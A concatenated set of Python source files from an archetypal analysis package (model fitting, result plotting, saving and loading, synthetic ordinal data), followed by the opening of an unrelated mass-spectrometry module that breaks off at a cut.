if model_type == "all" or model_type == "CAA":
self._results["CAA"].insert(0,self._CAA._compute_archetypes(self.X, K, p, n_iter, lr, mute,self.columns,early_stopping=early_stopping))
elif model_type == "all" or model_type == "OAA":
self._results["OAA"].insert(0,self._OAA._compute_archetypes(self.X, K, p, n_iter, lr, mute,self.columns,with_synthetic_data=False,early_stopping=early_stopping))
elif model_type == "all" or model_type == "RBOAA":
self._results["RBOAA"].insert(0,self._RBOAA._compute_archetypes(self.X, K, p, n_iter, lr, mute,self.columns, with_synthetic_data=False, early_stopping=early_stopping, with_OAA_initialization = with_hot_start))
elif model_type == "all" or model_type == "TSAA":
self._results["TSAA"].insert(0,self._TSAA._compute_archetypes(self.X, K, p, n_iter, lr, mute,self.columns,early_stopping=early_stopping))
else:
print("The model_type \"{0}\" specified, does not match any of the possible AA_types.".format(model_type))
success = False
elif self.has_synthetic_data and with_synthetic_data:
if model_type == "all" or model_type == "CAA":
self._synthetic_results ["CAA"].insert(0,self._CAA._compute_archetypes(self._synthetic_data.X, K, p, n_iter, lr, mute, self._synthetic_data.columns, with_synthetic_data=True,early_stopping=early_stopping))
elif model_type == "all" or model_type == "OAA":
self._synthetic_results["OAA"].insert(0,self._OAA._compute_archetypes(self._synthetic_data.X, K, p, n_iter, lr, mute, self._synthetic_data.columns,with_synthetic_data=True,early_stopping=early_stopping,for_hotstart_usage=False))
elif model_type == "all" or model_type == "RBOAA":
self._synthetic_results["RBOAA"].insert(0,self._RBOAA._compute_archetypes(self._synthetic_data.X, K, p, n_iter, lr, mute, self._synthetic_data.columns,with_synthetic_data=True,early_stopping=early_stopping,with_OAA_initialization = with_hot_start))
elif model_type == "all" or model_type == "TSAA":
self._synthetic_results["TSAA"].insert(0,self._TSAA._compute_archetypes(self._synthetic_data.X, K, p, n_iter, lr, mute, self._synthetic_data.columns,with_synthetic_data=True,early_stopping=early_stopping))
else:
print("The model_type \"{0}\" specified, does not match any of the possible AA_types.".format(model_type))
success = False
else:
print("\nYou have not loaded any data yet! \nPlease load data through the \'load_data\' or \'load_csv\' methods and try again.\n")
success = False
if success and self.has_dataframe:
self.create_dataframe(model_type=model_type,with_synthetic_data=with_synthetic_data,mute=True)
self.create_dataframe(model_type=model_type,with_synthetic_data=with_synthetic_data,archetype_rank=3,mute=True)
def plot(self,
model_type: str = "CAA",
plot_type: str = "PCA_scatter_plot",
title: str = "",
save_figure: bool = False,
filename: str = "figure",
result_number: int = 0,
attributes: list() = [1,2],
archetype_number: int = 1,
types: dict = {"type 1": [1],"type 2": [2]},
weighted: str = "equal_norm",
subject_indexes: list() = [1],
attribute_indexes: list() = [],
with_synthetic_data: bool = False):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.")
elif not plot_type in ["PCA_scatter_plot","attribute_scatter_plot","loss_plot","mixture_plot","barplot","barplot_all","typal_plot","pie_chart","attribute_distribution","circular_typal_barplot"]:
print("\nThe plot type you have specified can not be recognized. Please try again.\n")
elif not weighted in ["none","equal_norm","equal","norm"]:
print(f"\nThe \'weighted\' parameter received an unexpected value of {weighted}.\n")
elif not attribute_indexes == [] and not self.has_archetype_dataframe:
print(f"\nYou have not created any dataframe to plot w.r.t..\n")
elif not with_synthetic_data:
if result_number < 0 or not result_number < len(self._results[model_type]):
print("\nThe result you are requesting to plot is not availabe.\n Please make sure you have specified the input correctly.\n")
elif archetype_number < 1 or archetype_number > self._results[model_type][result_number].K:
print(f"\nThe \'archetype_number\' parameter received an unexpected value of {archetype_number}.\n")
elif any(np.array(attributes) < 0) or any(np.array(attributes) > len(self._results[model_type][result_number].columns)):
print(f"\nThe \'attributes\' parameter received an unexpected value of {attributes}.\n")
elif any(np.array(subject_indexes) < 0) or any(np.array(subject_indexes) > self._results[model_type][result_number].N-1):
print(f"\nThe \'subject_indexes\' parameter received an unexpected value of {subject_indexes}.\n")
else:
result = self._results[model_type][result_number]
result._plot(plot_type,attributes,archetype_number,types,weighted,subject_indexes,attribute_indexes, self.archetype_dataframe ,save_figure,filename,title)
if save_figure:
print("\nThe requested plot was successfully saved to your device!\n")
else:
print("\nThe requested plot was successfully plotted!\n")
else:
if result_number < 0 or not result_number < len(self._synthetic_results[model_type]):
print("\nThe result you are requesting to plot is not available.\n Please make sure you have specified the input correctly.\n")
elif archetype_number < 0 or archetype_number > self._synthetic_results[model_type][result_number].K:
print(f"\nThe \'archetype_number\' parameter received an unexpected value of {archetype_number}.\n")
elif any(np.array(attributes) < 0) or any(np.array(attributes) > len(self._synthetic_results[model_type][result_number].columns)):
print(f"\nThe \'attributes\' parameter received an unexpected value of {attributes}.\n")
elif any(np.array(subject_indexes) < 0) or any(np.array(subject_indexes) > self._synthetic_results[model_type][result_number].N-1):
print(f"\nThe \'subject_indexes\' parameter received an unexpected value of {subject_indexes}.\n")
else:
result = self._synthetic_results[model_type][result_number]
result._plot(plot_type,attributes,archetype_number,types,weighted,subject_indexes,attribute_indexes, self.archetype_dataframe,save_figure,filename,title)
print("\nThe requested synthetic data result plot was successfully plotted!\n")
def save_analysis(self,filename: str = "analysis",model_type: str = "CAA", result_number: int = 0, with_synthetic_data: bool = False, save_synthetic_data: bool = True):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.\n")
if not with_synthetic_data:
if not result_number < len(self._results[model_type]):
print("\nThe analysis you are requesting to save is not available.\n Please make sure you have specified the input correctly.\n")
else:
self._results[model_type][result_number]._save(filename)
print("\nThe analysis was successfully saved!\n")
else:
if not result_number < len(self._synthetic_results[model_type]):
print("\nThe analysis with synthetic data, which you are requesting to save is not available.\n Please make sure you have specified the input correctly.\n")
else:
self._synthetic_results[model_type][result_number]._save(filename)
if save_synthetic_data:
self._synthetic_data._save(model_type,filename)
print("\nThe analysis was successfully saved!\n")
def load_analysis(self, filename: str = "analysis", model_type: str = "CAA", with_synthetic_data: bool = False):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.\n")
elif not with_synthetic_data:
if not path.exists("results/" + model_type + "_" + filename + '.obj'):
print(f"The analysis {filename} of type {model_type} does not exist on your device.")
else:
file = open("results/" + model_type + "_" + filename + '.obj','rb')
result = pickle.load(file)
file.close()
self._results[model_type].append(result)
print("\nThe analysis was successfully loaded!\n")
else:
if not path.exists("synthetic_results/" + model_type + "_" + filename + '.obj'):
print(f"The analysis {filename} with synthetic data of type {model_type} does not exist on your device.")
else:
file = open("synthetic_results/" + model_type + "_" + filename + '.obj','rb')
result = pickle.load(file)
file.close()
self._synthetic_results[model_type].append(result)
file = open("synthetic_results/" + model_type + "_" + filename + '_metadata' + '.obj','rb')
result = pickle.load(file)
file.close()
self._synthetic_data = result
print("\nThe analysis with synthetic data was successfully loaded!\n")
self.has_synthetic_data = True
def create_dataframe(self, model_type: str = "CAA", result_number: int = 0, with_synthetic_data: bool = False, archetype_rank: int = 0, return_dataframe: bool = False, mute = False):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.\n")
return
if (with_synthetic_data and len(self._synthetic_results[model_type]) <= result_number) or (not with_synthetic_data and len(self._results[model_type]) <= result_number):
print("\nThe result you have specified to create the dataframe can not be recognized. Please try again.\n")
return
if with_synthetic_data:
result = self._synthetic_results[model_type][result_number]
else:
result = self._results[model_type][result_number]
if archetype_rank == False:
if self.has_dataframe:
self.archetype_dataframe = self.dataframe.copy()
for archetype in range(result.K):
self.archetype_dataframe["Archetype {0}".format(archetype+1)] = result.A[archetype,:]
if not mute:
print("\nThe dataframe was successfully created from a copy of your imported dataframe.\n")
else:
dict = {}
for archetype in range(result.K):
dict["Archetype {0}".format(archetype+1)] = result.A[archetype,:]
archetype_dataframe = pd.DataFrame.from_dict(dict)
self.archetype_dataframe = archetype_dataframe
if not mute:
print("\nThe dataframe was successfully created.\n")
else:
if self.has_dataframe:
self.ranked_archetype_dataframe = self.dataframe.copy()
for rank in range(archetype_rank):
rank_list = []
for n in range(result.N):
rank_list.append(np.where(result.A[:,n] == np.sort(result.A[:,n])[::-1][rank])[0][0]+1)
self.ranked_archetype_dataframe["Archetype Rank {0}".format(rank+1)] = rank_list
if not mute:
print("\nThe dataframe was successfully created from a copy of your imported dataframe.\n")
if archetype_rank == False:
self.has_archetype_dataframe = True
if return_dataframe:
return self.archetype_dataframe
else:
self.has_ranked_archetype_dataframe = True
if return_dataframe:
return self.ranked_archetype_dataframe
def get_dataframe(self,ranked_dataframe: bool = False):
if not ranked_dataframe:
if not self.has_archetype_dataframe:
print("\nThe dataframe which you have requested, does not exist yet.\n")
return self.archetype_dataframe
else:
if not self.has_ranked_archetype_dataframe:
print("\nThe dataframe which you have requested, does not exist yet.\n")
return self.ranked_archetype_dataframe
def get_analysis(self, model_type: str = "CAA", result_number: int = 0, with_synthetic_data: bool = False):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.\n")
return
if (with_synthetic_data and len(self._synthetic_results[model_type]) <= result_number) or (not with_synthetic_data and len(self._results[model_type]) <= result_number):
print("\nThe result you have specified to create the dataframe can not be recognized. Please try again.\n")
return
if with_synthetic_data:
result = self._synthetic_results[model_type][result_number]
else:
result = self._results[model_type][result_number]
return result | AA-module | /AA_module-1.2.0-py3-none-any.whl/AAM/AA_class.py | AA_class.py |
from AAM.plots_class import _plots
import pickle
########## CONVENTIONAL ARCHETYPAL ANALYSIS RESULT ##########
class _CAA_result:
plots = _plots()
def __init__(self, A, B, X, X_hat, n_iter, RSS, Z, K, p, time, columns,type, with_synthetic_data = False):
self.A = A
self.B = B
self.X = X
self.X_hat = X_hat
self.n_iter = len(RSS)
self.loss = RSS
self.Z = Z
self.K = K
self.p = p
self.time = time
self.columns = columns
self.type = type
self.with_synthetic_data = with_synthetic_data
self.N = len(self.X[0,:])
def _print(self):
if self.type == "CAA":
type_name = "Conventional Archetypal"
else:
type_name = "Two Step Archetypal"
print("/////////////// INFORMATION ABOUT " + type_name.upper() + " ANALYSIS \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\")
print(f"▣ The " + type_name + " Analysis was computed using " + str(self.K) + " archetypes.")
print(f"▣ The " + type_name + " Analysis was computed on " + str(len(self.X)) + " attributes.")
print(f"▣ The " + type_name + " Analysis was computed on " + str(self.N) + " subjects.")
print(f"▣ The " + type_name + " Analysis ran for " + str(self.n_iter) + " iterations.")
print(f"▣ The " + type_name + " Analysis took " + str(self.time) + " seconds to complete.")
print(f"▣ The final RSS was: {self.loss[-1]}.")
def _plot(self,plot_type, attributes, archetype_number, types, weighted, subject_indexes, attribute_indexes, archetype_dataframe, save_figure, filename,title):
if plot_type == "PCA_scatter_plot":
self.plots._PCA_scatter_plot(self.Z,self.X_hat,self.type, save_figure, filename,title)
elif plot_type == "attribute_scatter_plot":
self.plots._attribute_scatter_plot(self.Z,self.X_hat,attributes,self.type,self.p, save_figure, filename,title)
elif plot_type == "loss_plot":
self.plots._loss_plot(self.loss,self.type, save_figure, filename,title)
elif plot_type == "mixture_plot":
self.plots._mixture_plot(self.Z,self.A,self.type, save_figure, filename,title)
elif plot_type == "barplot":
self.plots._barplot(self.Z,self.columns,archetype_number,self.type, self.p, save_figure, filename,title)
elif plot_type == "barplot_all":
self.plots._barplot_all(self.Z,self.columns, self.type, self.p, save_figure, filename,title)
elif plot_type == "typal_plot":
self.plots._typal_plot(self.Z,types,weighted, save_figure, filename,title)
elif plot_type == "pie_chart":
self.plots._pie_chart(self.A, subject_indexes, attribute_indexes, archetype_dataframe, save_figure, filename,title)
elif plot_type == "attribute_distribution":
self.plots._attribute_distribution(self.A,self.Z,subject_indexes,self.columns,self.p,self.type, attribute_indexes, archetype_dataframe, save_figure, filename,title)
elif plot_type == "circular_typal_barplot":
self.plots._circular_typal_barplot(self.type,self.Z, types, archetype_number,self.columns,self.p, save_figure, filename, title)
def _save(self,filename):
if not self.with_synthetic_data:
file = open("results/" + self.type + "_" + filename + '.obj','wb')
else:
file = open("synthetic_results/" + self.type + "_" + filename + '.obj','wb')
pickle.dump(self, file)
file.close()
########## ORDINAL ARCHETYPAL ANALYSIS RESULT ##########
class _OAA_result:
plots = _plots()
def __init__(self, A, B, X, n_iter, b, Z, X_tilde, Z_tilde, X_hat, loss, K, p, time, columns,type,sigma, with_synthetic_data = False):
self.A = A
self.B = B
self.X = X
self.n_iter = len(loss)
self.b = b
self.sigma = sigma
self.X_tilde = X_tilde
self.Z_tilde = Z_tilde
self.X_hat = X_hat
self.loss = loss
self.Z = Z
self.K = K
self.p = p
self.time = time
self.columns = columns
self.type = type
self.with_synthetic_data = with_synthetic_data
self.N = len(self.X[0,:])
def _print(self):
if self.type == "RBOAA":
type_name = "Response Bias Ordinal Archetypal"
else:
type_name = "Ordinal Archetypal"
print("/////////////// INFORMATION ABOUT " + type_name.upper() + " ANALYSIS \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\")
print(f"▣ The " + type_name + " Analysis was computed using " + str(self.K) + " archetypes.")
print(f"▣ The " + type_name + " Analysis was computed on " + str(len(self.X)) + " attributes.")
print(f"▣ The " + type_name + " Analysis was computed on " + str(self.N) + " subjects.")
print(f"▣ The " + type_name + " Analysis ran for " + str(self.n_iter) + " iterations.")
print(f"▣ The " + type_name + " Analysis took " + str(self.time) + " seconds to complete.")
print(f"▣ The final loss was: {self.loss[-1]}.")
def _plot(self,plot_type, attributes, archetype_number, types, weighted, subject_indexes, attribute_indexes, archetype_dataframe, save_figure, filename,title):
if plot_type == "PCA_scatter_plot":
self.plots._PCA_scatter_plot(self.Z,self.X_hat,self.type, save_figure, filename,title)
elif plot_type == "attribute_scatter_plot":
self.plots._attribute_scatter_plot(self.Z,self.X_hat,attributes,self.type, self.p, save_figure, filename,title)
elif plot_type == "loss_plot":
self.plots._loss_plot(self.loss,self.type, save_figure, filename,title)
elif plot_type == "mixture_plot":
self.plots._mixture_plot(self.Z,self.A,self.type, save_figure, filename,title)
elif plot_type == "barplot":
self.plots._barplot(self.Z,self.columns,archetype_number,self.type,self.p, save_figure, filename,title)
elif plot_type == "barplot_all":
self.plots._barplot_all(self.Z,self.columns, self.type, self.p, save_figure, filename,title)
elif plot_type == "typal_plot":
self.plots._typal_plot(self.Z,types,weighted, save_figure, filename,title)
elif plot_type == "pie_chart":
self.plots._pie_chart(self.A,subject_indexes, attribute_indexes, archetype_dataframe, save_figure, filename,title)
elif plot_type == "attribute_distribution":
self.plots._attribute_distribution(self.A,self.Z,subject_indexes,self.columns,self.p,self.type,attribute_indexes, archetype_dataframe, save_figure, filename,title)
elif plot_type == "circular_typal_barplot":
self.plots._circular_typal_barplot(self.type,self.Z, types, archetype_number,self.columns,self.p,save_figure, filename, title)
def _save(self,filename):
if not self.with_synthetic_data:
file = open("results/" + self.type + "_" + filename + '.obj','wb')
else:
file = open("synthetic_results/" + self.type + "_" + filename + '.obj','wb')
pickle.dump(self, file)
file.close() | AA-module | /AA_module-1.2.0-py3-none-any.whl/AAM/AA_result_class.py | AA_result_class.py |
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from timeit import default_timer as timer
from AAM.AA_result_class import _OAA_result
from AAM.loading_bar_class import _loading_bar
########## ORDINAL ARCHETYPAL ANALYSIS CLASS ##########
class _OAA:
########## HELPER FUNCTION // EARLY STOPPING ##########
def _early_stopping(self):
next_imp = self.loss[-round(len(self.loss)/100)]-self.loss[-1]
prev_imp = (self.loss[0]-self.loss[-1])*1e-5
return next_imp < prev_imp
########## HELPER FUNCTION // A AND B ##########
def _apply_constraints_AB(self,A):
m = nn.Softmax(dim=1)
return m(A)
########## HELPER FUNCTION // BETAS ##########
def _apply_constraints_beta(self,b):
m = nn.Softmax(dim=0)
return torch.cumsum(m(b), dim=0)[:len(b)-1]
########## HELPER FUNCTION // SIGMA ##########
def _apply_constraints_sigma(self,sigma):
m = nn.Softplus()
return m(sigma)
########## HELPER FUNCTION // ALPHA ##########
def _calculate_alpha(self,b):
b_j = torch.cat((torch.tensor([0.0]),b),0)
b_j_plus1 = torch.cat((b,torch.tensor([1.0])),0)
alphas = (b_j_plus1+b_j)/2
return alphas
########## HELPER FUNCTION // X_tilde ##########
def _calculate_X_tilde(self,X,alphas):
X_tilde = alphas[X.long()-1]
return X_tilde
########## HELPER FUNCTION // X_hat ##########
def _calculate_X_hat(self,X_tilde,A,B):
Z = B @ X_tilde
X_hat = A @ Z
return X_hat
########## HELPER FUNCTION // LOSS ##########
def _calculate_loss(self,Xt, X_hat, b, sigma):
pad = nn.ConstantPad1d(1, 0)
b = pad(b)
b[-1] = 1.0
z_next = (b[Xt] - X_hat)/sigma
z_prev = (b[Xt-1] - X_hat)/sigma
z_next[Xt == len(b)+1] = np.inf
z_prev[Xt == 1] = -np.inf
P_next = torch.distributions.normal.Normal(0, 1).cdf(z_next)
P_prev = torch.distributions.normal.Normal(0, 1).cdf(z_prev)
neg_logP = -torch.log(( P_next - P_prev ) +1e-10)
loss = torch.sum(neg_logP)
return loss
########## HELPER FUNCTION // ERROR ##########
def _error(self,Xt,A_non_constraint,B_non_constraint,b_non_constraint,sigma_non_constraint):
A = self._apply_constraints_AB(A_non_constraint)
B = self._apply_constraints_AB(B_non_constraint)
b = self._apply_constraints_beta(b_non_constraint)
sigma = self._apply_constraints_sigma(sigma_non_constraint)
alphas = self._calculate_alpha(b)
X_tilde = self._calculate_X_tilde(Xt,alphas)
X_hat = self._calculate_X_hat(X_tilde,A,B)
loss = self._calculate_loss(Xt, X_hat, b, sigma)
return loss
########## COMPUTE ARCHETYPES FUNCTION OF OAA ##########
def _compute_archetypes(
self,
X,
K,
p,
n_iter,
lr,
mute,
columns,
with_synthetic_data = False,
early_stopping = False,
for_hotstart_usage = False):
########## INITIALIZATION ##########
self.N, self.M = len(X.T), len(X.T[0,:])
Xt = torch.tensor(X.T, dtype = torch.long)
self.loss = []
start = timer()
A_non_constraint = torch.autograd.Variable(torch.randn(self.N, K), requires_grad=True)
B_non_constraint = torch.autograd.Variable(torch.randn(K, self.N), requires_grad=True)
b_non_constraint = torch.autograd.Variable(torch.rand(p), requires_grad=True)
sigma_non_constraint = torch.autograd.Variable(torch.rand(1), requires_grad=True)
optimizer = optim.Adam([A_non_constraint,
B_non_constraint,
b_non_constraint,
sigma_non_constraint], amsgrad = True, lr = lr)
if not mute:
loading_bar = _loading_bar(n_iter, "Ordinal Archetypal Analysis")
########## ANALYSIS ##########
for i in range(n_iter):
if not mute:
loading_bar._update()
optimizer.zero_grad()
L = self._error(Xt,A_non_constraint,B_non_constraint,b_non_constraint,sigma_non_constraint)
self.loss.append(L.detach().numpy())
L.backward()
optimizer.step()
########## EARLY STOPPING ##########
if i % 25 == 0 and early_stopping:
if len(self.loss) > 200 and self._early_stopping():
if not mute:
loading_bar._kill()
print("Analysis ended due to early stopping.\n")
break
########## POST ANALYSIS ##########
A_f = self._apply_constraints_AB(A_non_constraint).detach().numpy()
B_f = self._apply_constraints_AB(B_non_constraint).detach().numpy()
b_f = self._apply_constraints_beta(b_non_constraint)
alphas_f = self._calculate_alpha(b_f)
X_tilde_f = self._calculate_X_tilde(Xt,alphas_f).detach().numpy()
Z_tilde_f = (self._apply_constraints_AB(B_non_constraint).detach().numpy() @ X_tilde_f)
sigma_f = self._apply_constraints_sigma(sigma_non_constraint).detach().numpy()
X_hat_f = self._calculate_X_hat(X_tilde_f,A_f,B_f)
end = timer()
time = round(end-start,2)
Z_f = B_f @ X_tilde_f
########## CREATE RESULT INSTANCE ##########
result = _OAA_result(
A_f.T,
B_f.T,
X,
n_iter,
b_f.detach().numpy(),
Z_f.T,
X_tilde_f.T,
Z_tilde_f.T,
X_hat_f.T,
self.loss,
K,
p,
time,
columns,
"OAA",
sigma_f,
with_synthetic_data=with_synthetic_data)
if not mute:
result._print()
########## RETURN RESULT IF REGULAR, RETURN MATRICIES IF HOTSTART USAGE ##########
if not for_hotstart_usage:
return result
else:
A_non_constraint_np = A_non_constraint.detach().numpy()
B_non_constraint_np = B_non_constraint.detach().numpy()
sigma_non_constraint_np = sigma_non_constraint.detach().numpy()
b_non_constraint_np = b_non_constraint.detach().numpy()
return A_non_constraint_np, B_non_constraint_np, sigma_non_constraint_np, b_non_constraint_np | AA-module | /AA_module-1.2.0-py3-none-any.whl/AAM/OAA_class.py | OAA_class.py |
import torch
import torch.nn as nn
import torch.optim as optim
from timeit import default_timer as timer
from AAM.loading_bar_class import _loading_bar
from AAM.AA_result_class import _CAA_result
########## CONVENTIONAL ARCHETYPAL ANALYSIS CLASS ##########
class _CAA:
########## HELPER FUNCTION // EARLY STOPPING ##########
def _early_stopping(self):
next_imp = self.RSS[-round(len(self.RSS)/100)]-self.RSS[-1]
prev_imp = (self.RSS[0]-self.RSS[-1])*1e-5
return next_imp < prev_imp
########## HELPER FUNCTION // CALCULATE ERROR FOR EACH ITERATION ##########
def _error(self, X,B,A):
return torch.norm(X - X@B@A, p='fro')**2
########## HELPER FUNCTION // A CONSTRAINTS ##########
def _apply_constraints(self, A):
m = nn.Softmax(dim=0)
return m(A)
########## COMPUTE ARCHETYPES FUNCTION OF CAA ##########
def _compute_archetypes(self, X, K, p, n_iter, lr, mute,columns,with_synthetic_data = False, early_stopping = False, for_hotstart_usage = False):
########## INITIALIZATION ##########
self.RSS = []
start = timer()
if not mute:
loading_bar = _loading_bar(n_iter, "Conventional Arhcetypal Analysis")
N, _ = X.T.shape
Xt = torch.tensor(X,requires_grad=False).float()
A = torch.autograd.Variable(torch.rand(K, N), requires_grad=True)
B = torch.autograd.Variable(torch.rand(N, K), requires_grad=True)
optimizer = optim.Adam([A, B], amsgrad = True, lr = lr)
########## ANALYSIS ##########
for i in range(n_iter):
if not mute:
loading_bar._update()
optimizer.zero_grad()
L = self._error(Xt, self._apply_constraints(B), self._apply_constraints(A))
self.RSS.append(L.detach().numpy())
L.backward()
optimizer.step()
########## EARLY STOPPING ##########
if i % 25 == 0 and early_stopping:
if len(self.RSS) > 200 and self._early_stopping():
if not mute:
loading_bar._kill()
print("Analysis ended due to early stopping.\n")
break
########## POST ANALYSIS ##########
A_f = self._apply_constraints(A).detach().numpy()
B_f = self._apply_constraints(B).detach().numpy()
Z_f = (Xt@self._apply_constraints(B)).detach().numpy()
X_hat_f = X@B_f@A_f
end = timer()
time = round(end-start,2)
result = _CAA_result(A_f, B_f, X, X_hat_f, n_iter, self.RSS, Z_f, K, p, time,columns,"CAA",with_synthetic_data = with_synthetic_data)
if not mute:
result._print()
if not for_hotstart_usage:
return result
else:
return A.detach().numpy(), B.detach().numpy() | AA-module | /AA_module-1.2.0-py3-none-any.whl/AAM/CAA_class.py | CAA_class.py |
import numpy as np
from scipy.stats import norm
import pickle
########## CLASS FOR CREATING SYNTHETIC DATA ##########
class _synthetic_data:
########## INITIALIZATION - CREATES THE DATA ##########
def __init__(self, N, M ,K, p, sigma, rb, a_param, b_param, sigma_std = 0):
self.N = N
self.M = M
self.K = K
self.p = p
self.columns = ["SQ"+str(i) for i in range(1, M+1)]
self.X, self.Z, self.Z_alpha, self.A, self.betas = self.X(N=N, M=M, K=K, p=p, sigma=sigma, rb=rb, a_param=a_param, b_param=b_param, sigma_std = sigma_std)
########## IF THERE IS RESPONSE BIAS IN THE DATA ##########
def biasedBetas(self, N, p, b_param):
b = np.array([b_param]*p)
return np.random.dirichlet(b, size=N)
########## CONTSTRAINTS ON THE RESPONSE BIAS BETAS ##########
def betaConstraintsBias(self, betas):
N, J = betas.shape
new_betas = np.empty((N,J))
denoms = np.sum(betas,axis=1)
for i in range(N):
for j in range(J):
new_betas[i,j] = np.sum(betas[i,:j+1])/denoms[i]
# Return and remove the column of ones
return new_betas[:,:-1]
########## CONSTRAINTS ON THE NON RESOPNS BIAS BETAS ##########
def betaConstraints(self, betas):
new_betas = np.empty(len(betas))
denom = sum(betas)
for i in range(len(new_betas)):
new_betas[i] = np.sum(betas[:i+1]) / denom
return new_betas[:-1]
########## SOFTPLUS HELPER FUNCTION ##########
def softplus(self, sigma, sigma_std):
if sigma_std == 0:
return np.log(1 + np.exp(sigma))
else:
sigmas = []
for n in range(self.N):
sigmas.append(np.log(1 + np.exp(sigma + np.random.uniform(-1,1,1)*sigma_std)))
sigmasMatrix = np.repeat(sigmas, self.M, axis=1)
return sigmasMatrix
########## HELPER FUNCTION, CALCULATES THE Z ARCEHTYPE MATRIX ##########
def get_Z(self, N, M, K, p, rb, b_param):
# Ensure reproducibility
np.random.seed(42)
# Check to ensure that there are no NaN's
if b_param < 0.01:
b_param = 0.01
betas = np.array([b_param]*p)
betas = self.betaConstraints(betas)
alphas = np.empty(p)
alphas[0] = (0 + betas[0]) / 2
alphas[-1] = (1+ betas[-1]) / 2
for i in range(len(betas)-1):
alphas[i+1] = (betas[i] + betas[i+1]) / 2
Z_ordinal = np.ceil(np.random.uniform(0, 1, size = (M,K))*p).astype(int)
Z_alpha = alphas[Z_ordinal-1]
if rb == True:
betas = self.biasedBetas(N=N, p=p, b_param=b_param)
betas = self.betaConstraintsBias(betas)
return Z_ordinal, Z_alpha, betas
########## HELPER FUNCTION, CALCULATES THE A LINEAZR COMBINATION MATRIX ##########
def get_A(self, N, K, a_param):
np.random.seed(42) # set another seed :)
# Constrain a_param to avoid NaN's
if a_param < 0.01:
a_param = 0.01
alpha = np.array([a_param]*K)
return np.random.dirichlet(alpha, size=N).transpose()
########## HELPER FUNCTION, CALCULATES THE D DENSITY MATRIX ##########
def get_D(self, X_rec, betas, sigma, rb):
M, N = X_rec.shape
if rb == False:
J = len(betas)
D = np.empty((J+2, M, N))
for j in range(J+2):
# Left-most tail
if j == 0:
D[j] = np.ones((M,N))*(np.inf*(-1))
# Right-most tail
elif j == J+1:
D[j] = np.ones((M,N))*(np.inf)
else:
D[j] = (betas[j-1] - X_rec)/(sigma.T+1e-16) ## Add softplus(sigma)
else:
J = len(betas[0,:])
D = np.empty((J+2, M, N))
# D = torch.rand(len(betas[0,:])+2,M,N)
# D[0] = torch.tensor(np.matrix(np.ones((N)) * (-np.inf)))
# D[-1] = torch.tensor(np.matrix(np.ones((N)) * (np.inf)))
# D[1:-1] = torch.div(torch.unsqueeze(betas.T, 2).repeat(1,1,N)-X_rec.T,torch.unsqueeze(sigma+1e-16, 1).repeat(1,N))
for j in range(J+2):
if j == 0:
D[j] = np.ones((M,N))*(np.inf*(-1))
elif j == J+1:
D[j] = np.ones((M,N))*(np.inf)
else:
D[j] = (betas[:,j-1] - X_rec)/((sigma.T+1e-16)) ## Add softplus(sigma)
# D[j] = torch.div((b[:,j-1] - X_hat[:, None]),sigma)[:,0,:].T
# print("SHAPEEEE", D.shape)
# min = np.min(D[(D > -np.inf) & (D < np.inf)])
# max = np.max(D[(D > -np.inf) & (D < np.inf)])
# D[J+1] = np.ones((M,N))*(max + (max-min)/J)
# D[0] = np.ones((M,N))*(min - (max-min)/J)
# print("min, max:", min, max)
# print("D_0", D[0])
return D - np.mean(D[1:-1])
########## HELPER FUNCTION, CALCULATES THE PROBABILITY FROM THE DENSITY MATRIX ##########
def Probs(self, D):
J, M, N = D.shape
probs = np.empty((J-1, M, N))
for i in range(J):
if i != J-1:
probs[i,:,:] = norm.cdf(D[i+1], loc=0, scale=1) - norm.cdf(D[i], loc=0, scale=1)
return probs
########## HELPER FUNCTION, SAMPLES FROM PROBABILITY MATRIX TO GET CATEGORICAL ##########
def toCategorical(self, probs):
categories = np.arange(1, len(probs)+1)
J, M, N = probs.shape
X_cat = np.empty((M,N))
for m in range(M):
for n in range(N):
X_cat[m,n] = int(np.random.choice(categories, p = list(probs[:,m,n])))
X_cat = X_cat.astype(int)
return X_cat
########## CALUCLATES DATA WITH HELP OF ALL OTHER FUNCTIONS ##########
def X(self, M, N, K, p, sigma, rb=False, a_param=1, b_param=100, sigma_std = 0):
Z_ordinal, Z_alpha, betas = self.get_Z(N=N,M=M, K=K, p=p, rb=rb, b_param=b_param)
A = self.get_A(N, K, a_param=a_param)
X_rec = Z_alpha@A
D = self.get_D(X_rec, betas, self.softplus(sigma, sigma_std), rb=rb)
probs = self.Probs(D)
X_final = self.toCategorical(probs)
return X_final, Z_ordinal, Z_alpha, A, betas
########## SAVES THE DATA LOCALLY ON PC ##########
def _save(self,type,filename):
file = open("synthetic_results/" + type + "_" + filename + '_metadata' + '.obj','wb')
pickle.dump(self, file)
file.close() | AA-module | /AA_module-1.2.0-py3-none-any.whl/AAM/synthetic_data_class.py | synthetic_data_class.py |
import pandas as pd
import numpy as np
from collections import defaultdict, Counter
import logging
from pyteomics import mass
try:
from pyteomics import cmass
except ImportError:
cmass = mass
import string
from . import utils, io
logger = logging.getLogger(__name__)
def get_theor_spectrum(peptide, acc_frag, ion_types=('b', 'y'), maxcharge=1,
aa_mass=mass.std_aa_mass, modifications=None, **kwargs):
"""
Calculates theoretical spectra in two ways: usual one and in integer format (mz / frag_acc).
Parameters
----------
peptide : list
Peptide sequence.
acc_frag : float
Fragment mass accuracy in Da.
ion_types : tuple
Fragment ion types. ('b', 'y')
maxcharge: int
Maximum charge of fragment ion.
aa_mass: dict
Amino acid masses
modifications : dict or None
Dict of modifications applied to peptide (int position -> float mass shift)
Returns
-------
Returns spectrum in two ways (usual, integer). Usual is a dict with key [ion type, charge] and m/z as a value.
Integer is a dict, where key is ion type and value is a set of integers (m/z / fragment accuracy).
"""
if not isinstance(peptide, list):
raise Exception('peptide is not a list: {!r}'.format(peptide))
peaks = defaultdict(list)
theor_set = defaultdict(list)
aa_mass = aa_mass.copy()
H = mass.nist_mass['H'][0][0]
nterm_mod = aa_mass.pop('H-', H)
OH = H + mass.nist_mass['O'][0][0]
